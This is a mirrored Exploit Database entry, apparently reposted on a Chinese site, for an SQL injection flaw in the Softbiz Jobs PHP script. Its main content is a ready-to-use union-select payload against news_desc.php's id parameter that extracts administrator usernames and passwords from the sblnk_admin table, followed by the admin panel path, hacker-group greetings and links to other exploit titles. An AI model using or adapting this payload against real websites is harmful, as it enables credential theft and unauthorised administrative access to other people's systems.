Softbiz Jobs – ‘news_desc’ SQL Injection

Exploit Database
11 阅读

作者： BAYBORA

日期： 2010-02-22
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11518/

Softbiz Jobs ( news_desc) SQL Injection Vulnerability

########################### 
Author: Baybora

Homepage: http://www.1923turk.com 

Blog: http://baybora.wordpress.com/

Script: softbizscripts

Download: http://www.softbizscripts.com/

########################### 

Exploat:news_desc.php?id=SQL 
 

-4+union+select+1,concat(username,0x3a,password),3,4,5+from+sblnk_admin--



http://server/news_desc.php?id=-4+union+select+1,concat(username,0x3a,password),3,4,5+from+sblnk_admin--

 
http://xxxx/admin
 

##############################################################
# Greetz: Manas58 - Gamoscu - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO
##############################################################

last Exploits
Softbiz Jobs – ‘news_desc’ SQL Injection的更多信息

Joomla! Component jLike 1.0 – Information Leak：
Easy POS System – ‘login.php’ SQL Injection：
Kayako Fusion – ‘download.php’ Cross-Site Scripting：
Employee Task Management System v1.0 – SQL Injection on (task-details.php?task_id=?)：
Kimai 1.14 – CSV Injection：
POS Codekop v2.0 – Authenticated Remote Code Execution (RCE)：
WordPress Plugin Jibu Pro 1.7 – Cross-Site Scripting：
PhpWiki 1.5.4 – Multiple Vulnerabilities：